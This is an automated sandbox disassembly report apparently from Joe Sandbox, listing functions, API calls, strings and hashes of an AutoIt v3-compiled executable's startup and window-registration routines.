                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3948761352-1609664196
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Include$\
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3173733714-3429789819
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A17
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A20
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1255752989-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: FILE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3888824918-3121273764
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                                                                                                                                                                                                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00A67998,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A67998,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Default
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1579825452-753088835
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
